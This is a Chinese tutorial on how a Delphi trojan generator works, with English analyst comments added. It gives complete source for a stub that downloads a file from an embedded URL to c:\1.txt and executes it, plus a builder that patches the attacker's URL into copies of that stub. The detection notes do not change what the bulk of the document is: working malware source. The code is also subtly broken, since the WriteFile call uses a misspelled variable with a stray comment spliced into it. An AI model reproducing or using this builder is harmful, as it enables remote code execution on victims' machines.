Delphi木马生成器原理

先写服务端Server.exe,控制台程序

program server;

{$IMAGEBASE $13140000}

uses
  Windows,
  SysUtils,
  urlmon,
  shellapi;
// 64-byte placeholder that the builder (TForm1.Button1Click in Unit1) later
// overwrites inside the compiled Server.exe with the real download URL, padded
// with NUL bytes to 64 bytes. Analyst note: a sample produced this way carries
// its URL as a plaintext, fixed-width string at a fixed file offset, so the
// URL can be recovered statically without running the binary.
var
  url: pchar ='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
{ Download-and-execute stage of the server.
  Fetches whatever `url` points to into the hard-coded path c:\1.txt
  (urlmon.URLDownloadToFile; reserved argument 0, no status callback) and then
  launches that file through ShellExecute with the 'open' verb, i.e. whatever
  handler the shell associates with the downloaded file (nShowCmd 1 =
  SW_SHOWNORMAL). Neither call's return value is checked, so failures are
  silent.
  Detection note: the observable behaviour of this stage is a console process
  importing urlmon!URLDownloadToFile, creating C:\1.txt, and immediately
  invoking ShellExecute on that same path. }
procedure Download;
begin
URLDownloadToFile(nil, url, 'c:\1.txt', 0, nil);
shellexecute(0,'open','c:\1.txt',0,0,1);
end;

{ Program entry point: runs the download-and-execute stage once and exits.
  There is no persistence, loop or error handling in the visible code. }
begin
  DownLoad;
end.

再将Server.exe做成资源文件,RC文件写:jack RCDATA server.exe
找Server.exe文件偏移地址,用C32打开Server.exe,查找aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
将首地址转换成十进制即是我们要找的下载地址偏移。

再写主程序,将Server.exe资源文件加入,{$R server.RES}。

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;
    const
  OFFSET_URL =  65400;    // Hard-coded file offset of the 64-byte URL placeholder inside the embedded
                          // Server.exe (the text above describes locating it with a hex editor). It is
                          // only valid for that exact Server.exe build; nothing in the code verifies that
                          // the bytes at this offset are actually the placeholder before overwriting them.

type
  { Builder form. Edit1 supplies the download URL; Button1 triggers generation
    of the patched Server.exe (see Button1Click). Edit2 and Label1 are not
    referenced by any code visible in this unit. }
  TForm1 = class(TForm)
    Label1: TLabel;
    Edit1: TEdit;      // download URL typed by the user (read in Button1Click)
    Button1: TButton;  // "generate" action
    Edit2: TEdit;      // unused in the visible code
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;  // auto-created main form instance

implementation

{$R *.dfm}
{$R server.RES}

{ Builder action: validates that Edit1 is non-empty, asks for an output path via
  a TSaveDialog, copies the RCDATA resource 'jack' (the embedded Server.exe) to
  that path, then seeks to OFFSET_URL and overwrites 64 bytes with the URL
  NUL-padded to 64 bytes. Only user-facing message boxes report the outcome;
  the results of WriteFile/SetFilePointer are not checked.
  Analyst note: the emitted file is a byte-for-byte copy of the embedded
  resource except for the 64-byte URL field at OFFSET_URL, so the embedded
  Server.exe and every sample built from it share the same bytes elsewhere
  (same image base $13140000, same imports), which makes them easy to cluster. }
procedure TForm1.Button1Click(Sender: TObject);
var
  WriteBuff, ResultFilePath, ResourcePointer: PChar;
  ResourceLocation: HRSRC;
  ResourceSize, BytesWritten: Longword;
  ResDataHandle: THandle;
  FileHandle: THandle;
  sf:TSaveDialog;
  Url:string;
begin
  // Refuse to build when no URL was entered.
  if trim(edit1.Text)='' then
  begin
    Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
    exit;
  end;
  // Owned by Application; never freed explicitly in this method.
  sf :=TSaveDialog.Create(Application);
  sf.DefaultExt :='exe';
  sf.Title :='生成';
  if not sf.Execute then exit;
  Url :=trim(Edit1.Text); // trim() strips surrounding whitespace from the edit-box text
  ResultFilePath := pchar(sf.FileName);
  // Locate the RCDATA resource named 'jack' (the embedded Server.exe, see {$R server.RES}).
  ResourceLocation := FindResource(HInstance, 'jack', RT_RCDATA);
  if ResourceLocation <> 0 then
  begin
    ResourceSize := SizeofResource(HInstance, ResourceLocation);
    if ResourceSize <> 0 then
    begin
      ResDataHandle := LoadResource(HInstance, ResourceLocation);
      if ResDataHandle <> 0 then
      begin
        ResourcePointer := LockResource(ResDataHandle);
        if ResourcePointer <> nil then
        begin
          // CREATE_ALWAYS: an existing file at the chosen path is overwritten.
          FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
          if FileHandle <> INVALID_HANDLE_VALUE then
          begin
            // Dump the whole resource (the embedded Server.exe) into the new file.
            WriteFile(FileHandle, ResourcePointer^, {English for "resource + size"}ResourseSize, BytesWritten, nil);
            Sleep(10);  // no stated purpose
            // Patch the URL field: seek to the placeholder and write a fixed 64-byte,
            // NUL-padded copy of the URL over it (64 = length of the 'aaaa...' placeholder).
            SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);
            WriteBuff := PChar(Url + StringOfChar(#0, 64 - Length(Url)));
            WriteFile(FileHandle, WriteBuff^, 64, BytesWritten, nil);
            CloseHandle(FileHandle);  // must not be omitted: flushes and releases the output file
            MessageBox(0, '配置成功', '提示', mb_iconinformation);
          end;
        end;
      end;
    end;
  end;
end;

end.